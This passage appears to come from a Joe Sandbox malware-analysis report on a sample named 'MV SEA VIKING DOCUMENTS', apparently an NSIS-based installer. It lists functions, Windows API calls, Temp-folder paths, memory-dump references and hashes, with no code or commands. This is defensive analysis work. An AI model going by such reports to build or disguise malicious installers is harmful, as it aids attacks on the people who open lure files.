                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                                                                • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2584051700-0
                                                                                                                                                                                                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 714916BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,714922D8,?,00000808), ref: 714916D5
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,714922D8,?,00000808), ref: 714916DC
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,714922D8,?,00000808), ref: 714916F0
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(714922D8,00000000), ref: 714916F7
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71491700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                                                                                                                • Opcode ID: 4523d29ab8c27e00e4bc58600403cf67c3413113a2fb8392024034e1d384ff87
                                                                                                                                                                                                                                • Instruction ID: bb16fda867d8f11a82ecbdc258fd610f3737527f48055b35ba6d939bafe51535
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4523d29ab8c27e00e4bc58600403cf67c3413113a2fb8392024034e1d384ff87
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7F0ACB320A1387BD6211AA7CD4CDABBE9CDF9B2F5B250215F628A219086615D01D7F1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405EB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp, xrefs: 00405EB8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 3213498283-4141617732
                                                                                                                                                                                                                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 714910E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 71491171
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 714911E3
                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 7149124A
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 7149129B
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 714912B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                                                                • Opcode ID: 50c4ccdc4140c5f6d7a5b26d2165bdd540325eb5b665ba41086a58f852f23abd
                                                                                                                                                                                                                                • Instruction ID: 456f883afe7f69dfd2a5da1075ef38cdd415f972fe955f6db4a924ff4d076e8c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50c4ccdc4140c5f6d7a5b26d2165bdd540325eb5b665ba41086a58f852f23abd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB519DF6904202DFE701DF6AC944A257FB8FB68B25B24415AF946FB250E730E911CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 00402695
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1659193697-4249849587
                                                                                                                                                                                                                                • Opcode ID: ce5005d06b1fe62c951d2c108b7deea1323e23eaef29f3c489712312079c6529
                                                                                                                                                                                                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce5005d06b1fe62c951d2c108b7deea1323e23eaef29f3c489712312079c6529
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

